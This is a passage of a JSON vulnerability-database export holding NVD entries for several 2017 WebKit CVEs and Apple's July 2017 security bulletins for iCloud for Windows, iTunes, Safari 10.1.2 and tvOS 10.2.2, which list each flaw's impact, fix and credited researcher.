["CVE-2017-7048"], "modified": "2019-03-22T19:28:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7048", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. 
It allows attackers to bypass intended memory-read restrictions via a crafted app.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7064", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2019-05-10T19:19:00", "cpe": ["cpe:/o:apple:iphone_os:10.3.2", "cpe:/a:apple:safari:10.1.1", "cpe:/a:apple:icloud:6.2.1", "cpe:/a:apple:itunes:12.6.1"], "id": "CVE-2017-7064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:iphone_os:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:itunes:12.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:icloud:6.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. 
The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7061", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7061"], "modified": "2019-03-22T19:29:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7061", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7061", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7055", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7055"], "modified": "2019-03-21T21:03:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7055", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7055", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-20T16:29:00", "title": "CVE-2017-7056", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7056"], "modified": "2019-03-21T20:56:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-7056", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7056", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}], "apple": [{"lastseen": "2020-12-24T20:43:14", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], 
"description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2.2\n\nReleased July 19, 2017\n\n**libxml2**\n\nAvailable for: Windows 7 and later\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project 
Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-19T05:37:40", "published": "2017-07-19T05:37:40", "id": "APPLE:HT207927", "href": "https://support.apple.com/kb/HT207927", "title": "About the security content of iCloud for Windows 6.2.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", 
"CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.6.2 for Windows\n\nReleased July 19, 2017\n\n**iTunes**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An access issue was addressed with additional restrictions.\n\nCVE-2017-7053: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**libxml2**\n\nAvailable for: Windows 7 and later\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security 
Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code 
execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-19T05:43:08", "published": "2017-07-19T05:43:08", "id": "APPLE:HT207928", "href": "https://support.apple.com/kb/HT207928", "title": "About the security content of iTunes 12.6.2 for Windows - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 10.1.2\n\nReleased July 19, 2017\n\n**Safari Printing**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to an infinite number of print dialogs\n\nDescription: An issue existed where a malicious or compromised website could show infinite print dialogs and make users believe their browser was locked. The issue was addressed through throttling of print dialogs.\n\nCVE-2017-7060: Travis Kelley of City of Mishawaka, Indiana\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. 
This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: David Kohlbrenner of UC San Diego, an anonymous researcher\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed with improved frame handling.\n\nCVE-2017-7011: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6 \n\nImpact: Processing maliciously 
crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n", "edition": 2, "modified": "2017-07-29T06:22:02", "published": "2017-07-29T06:22:02", "id": "APPLE:HT207921", "href": "https://support.apple.com/kb/HT207921", "title": "About the 
security content of Safari 10.1.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7062", "CVE-2017-7020", "CVE-2017-7008", "CVE-2017-7038", "CVE-2017-7026", "CVE-2017-7056", "CVE-2017-7024", "CVE-2017-7055", "CVE-2017-7022", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-9417", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7029", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7023", "CVE-2017-7066", "CVE-2017-7028", "CVE-2017-7025", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7069", "CVE-2017-7009", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7065", "CVE-2017-7047", "CVE-2017-7068", "CVE-2017-7030", "CVE-2017-7041", "CVE-2017-7027"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2.2\n\nReleased July 19, 2017\n\n**Contacts**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-7062: Shashank (@cyberboyIndia)\n\n**CoreAudio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved bounds checking.\n\nCVE-2017-7008: Yangkang (@dnpushme) of Qihoo 360 Qex Team\n\n**IOUSBFamily**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7009: shrek_wzw of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7022: an anonymous researcher\n\nCVE-2017-7024: an anonymous researcher\n\nCVE-2017-7026: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7023: an anonymous researcher\n\nCVE-2017-7025: an anonymous researcher\n\nCVE-2017-7027: an anonymous researcher\n\nCVE-2017-7069: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th 
generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-7028: an anonymous researcher\n\nCVE-2017-7029: an anonymous researcher\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Unpacking a maliciously crafted archive may lead to arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-7068: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**libxpc**\n\nAvailable for: Apple TV (4th generation) \n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7047: Ian Beer of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. 
This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: David Kohlbrenner of UC San Diego, an anonymous researcher\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. 
This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7065: Gal Beniamini of Google Project Zero\n\nEntry added September 25, 2017\n\n**Wi-Fi**\n\nAvailable for: 